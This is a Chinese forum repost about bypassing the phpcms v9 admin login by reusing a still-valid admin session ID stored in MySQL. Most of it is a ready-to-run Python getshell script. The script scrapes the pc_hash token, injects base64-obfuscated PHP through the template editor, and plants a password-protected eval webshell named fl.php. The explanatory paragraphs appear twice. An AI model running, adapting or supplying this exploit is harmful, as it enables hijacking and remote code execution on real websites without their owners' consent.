phpcmsv9后台登录绕过
转载于:http://huakai.paxmac.org/?p=600
这个乌云上已经发了,但是木有公布。经过我老大flyh4t的指点,找到了其他的利用方法。
http://www.wooyun.org/bugs/wooyun-2013-026915
(在注入出的hash无法破解的情况下)
phpcmsv9在数据库中存储着session
默认是mysql方式存储,session的有效期默认为30分钟。
/phpcms/libs/classes/session_mysql.class.php这里只要触发了gc session就会被更新,如果超时了就删除。
来看看哪里会触发gc
/phpcms/modules/member/index.php前台注册 登录 后台登录都会触发gc操作。所以如果管理没有注销的情况,没人访问触发这些操作的情况下,就算过了半小时,session也不会消失,任然能拿shell。如果session无效,可以通过脚本20分钟监测一次,看是否有效,然后getshell。
Python写的getshell的脚本
这个乌云上已经发了,但是木有公布。经过我老大flyh4t的指点,找到了其他的利用方法。
http://www.wooyun.org/bugs/wooyun-2013-026915
(在注入出的hash无法破解的情况下)
phpcmsv9在数据库中存储着session
<?php
return array(
//网站路径
'web_path' => '/phpcms/install_package/',
//Session配置
'session_storage' => 'mysql',
'session_ttl' => 1800,
'session_savepath' => CACHE_PATH.'sessions/',
'session_n' => 0,
//Cookie配置
'cookie_domain' => '', //Cookie 作用域
'cookie_path' => '', //Cookie 作用路径
'cookie_pre' => 'MydlE_', //Cookie 前缀,同一域名下安装多套系统时,请修改Cookie前缀
'cookie_ttl' => 0, //Cookie 生命周期,0 表示随浏览器进程
//模板相关配置
'tpl_root' => 'templates/', //模板保存物理路径
'tpl_name' => 'default', //当前模板方案目录
'tpl_css' => 'default', //当前样式目录
'tpl_referesh' => 1,
'tpl_edit'=>1,//是否允许在线编辑模板
/phpcms/libs/classes/session_mysql.class.php
public function __construct() {
$this->db = pc_base::load_model('session_model');
$this->lifetime = pc_base::load_config('system','session_ttl');
session_set_save_handler(array(&$this,'open'), array(&$this,'close'), array(&$this,'read'), array(&$this,'write'), array(&$this,'destroy'), array(&$this,'gc'));
session_start();
}
…….
public function destroy($id) {
return $this->db->delete(array('sessionid'=>$id));
}
/**
* 删除过期的 session
*
* @param $maxlifetime 存活期时间
* @return bool
*/
public function gc($maxlifetime) {
$expiretime = SYS_TIME - $maxlifetime;
return $this->db->delete("`lastvisit`<$expiretime");
}
}
来看看哪里会触发gc
/phpcms/modules/member/index.php
private function _session_start() {
$session_storage = 'session_'.pc_base::load_config('system','session_storage');
pc_base::load_sys_class($session_storage);
}
Python写的getshell的脚本
#! /usr/bin/env python
import urllib2,re
#code by 花开、若相惜
#PaxMac Team
url=raw_input('input your attack url: ')
CmsCookie="PHPSESSID=18iigb6m80nrl1v7u5h53v7km3"#change here
response = urllib2.Request(url+'/index.php?m=admin')
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
#print attck.read()
pattern = re.compile('pc_hash=\w{6}', re.I)
match = pattern.search(attck.read())
if match:
hashkey=match.group()
print "I Got pc_hash :"+hashkey
attck.close()
print "Start getshell..."
data="code=%3C%3Fphp+fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW25zdGVzdDIwMTNdKTsgPz4x))%3B%3F%3E%0D%0A%7Btemplate+\
%27member%27%2C+%27header%27%7D%0D%0A%3Cdiv+id%3D%22memberArea%22%3E%0D%0A%7Btemplate+%27member%27%2C+%27left%27%7D%0D%0A%3Cdiv+class%3D%22\
col-auto%22%3E%0D%0A%3Cdiv+class%3D%22col-1+%22%3E%0D%0A%3Ch6+class%3D%22title%22%3E%E6%B6%88%E8%B4%B9%E8%AE%B0%E5%BD%95%3C%2Fh6%3E%0D%0A%3Cdiv+\
class%3D%22content%22%3E%0D%0A%3Cform+name%3D%22searchform%22+action%3D%22%7BAPP_PATH%7Dindex.php%3Fm%3Dpay%26c%3Dspend_list%26a%3Dinit%22+\
method%3D%22get%22+%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22pay%22+name%3D%22m%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+\
value%3D%22spend_list%22+name%3D%22c%22%3E%0D%0A%3Cinput+type%3D%22hidden%22+value%3D%22init%22+name%3D%22a%22%3E%0D%0A%09%09%3Cdiv+\
class%3D%22search%22%3E%0D%0A%09%09%E8%AE%A2%E5%8D%95%E6%97%B6%E9%97%B4++%7Bform%3A%3Adate%28%27starttime%27%2Cformat%3A%3Adate%28%24starttime%29%29%7D\
+%E5%88%B0+++%7Bform%3A%3Adate%28%27endtime%27%2Cformat%3A%3Adate%28%24endtime%29%29%7D%0D%0A%09%09%7Bform%3A%3A\
select%28array%28%27%27%3D%3E%27%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%27%2C+%271%27%3D%3E%27%E9%87%91%E9%92%B1%27%2C+%272%27%3D%3E%27%E7%A7%AF%E5%88%86%27%29%2C%24\
type%2C%27name%3D%22type%22%27%29%7D++%0D%0A%09%09%3Cinput+type%3D%22submit%22+value%3D%22%E6%9F%A5%E8%AF%A2%22+class%3D%22button%22+name%3D%22\
dosubmit%22%3E%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%3C%2Fform%3E%0D%0A%3Ctable+width%3D%22100%25%22+cellspacing%3D%220%22++\
class%3D%22table-list%22%3E%0D%0A++++++++%3Cthead%3E%0D%0A++++++++++++\
%3Ctr%3E%0D%0A++++++++++++%3Cth+width%3D%2220%25%22%3E%E6%B6%88%E8%B4%B9%E5%86%85%E5%AE%B9%3C%2Fth%3E%0D%0A++++++++++++\
%3Cth+width%3D%2220%25%22%3E%E6%97%B6%E9%97%B4%3C%2Fth%3E%0D%0A++++++++++++%3Cth+width%3D%2215%25%22%3E%E6%B6%88%E8%B4%B9%E7%B1%BB%E5%9E%8B%3C%2Fth%3E%0D%0A\
++++++++++++%3Cth+width%3D%228%25%22%3E%E6%95%B0%E9%87%8F%3C%2Fth%3E%0D%0A++++++++++++%3C%2Ftr%3E%0D%0A++++++++%3C%2Fthead%3E%0D%0A++++\
%3Ctbody%3E%0D%0A%09%7Bloop+%24list+%24info%7D+%0D%0A%09%3Ctr%3E%0D%0A%09%3Ctd+width%3D%2220%25%22+align%3D%22center%22%3E%7B%24info%5B%27msg%27%5D%7D%3C\
%2Ftd%3E%0D%0A%09%3Ctd++width%3D%2220%25%22+align%3D%22center%22%3E%7Bformat%3A%3Adate%28%24info%5B%27creat_at%27%5D%2C+1%29%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+\
width%3D%2215%25%22+align%3D%22center%22%3E%7Bif+%24info%5Btype%5D%3D%3D1%7D%E9%87%91%E9%92%B1%7Belseif+%24info%5Btype%5D%3D%3D2%7D%E7%A7%AF%E5%88%86%7B%2F\
if%7D%3C%2Ftd%3E%0D%0A%09%3Ctd+width%3D%228%25%22+align%3D%22center%22%3E%7B%24info%5B%27value%27%5D%7D%3C%2Ftd%3E%0D%0A%09%3C%2Ftr%3E%0D%0A%09%7B%2Floop%7D%0D%0A\
++++%3C%2Ftbody%3E%0D%0A++++%3C%2Ftable%3E%0D%0A%0D%0A+%3Cdiv+id%3D%22pages%22%3E+%7B%24pages%7D%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cspan+\
class%3D%22o1%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o2%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o3%22%3E%3C%2Fspan%3E%3Cspan+class%3D%22o4%22%3E%3C%2Fspan%3E%0D%0A%3C%2F\
div%3E%0D%0A%0D%0A%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27member%27%2C+%27footer%27%7D%0D%0A&dosubmit=%E6%8F%90%E4%BA%A4&"+hashkey
response = urllib2.Request(url+'/index.php?m=template&c=file&a=edit_file&style=default&dir=pay&file=spend_list.html',data)
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
#print attck.read()
attck.close()
response = urllib2.Request(url+'/index.php?m=template&c=file&a=visualization&style=default&dir=pay&file=spend_list.html&'+hashkey)
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
attck.close()
try:
response = urllib2.Request(url+'/fl.php')
response.add_header('Cookie',CmsCookie)
response.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)')
attck = urllib2.urlopen(response)
if str(attck.read())=="1":
print "Webshell :"+url+'/fl.php'+" "+"password:nstest2013"
else:
print "Failed!"
attck.close()
except urllib2.HTTPError, e:
print e.code
评论21次
额 在90看到了这个帖子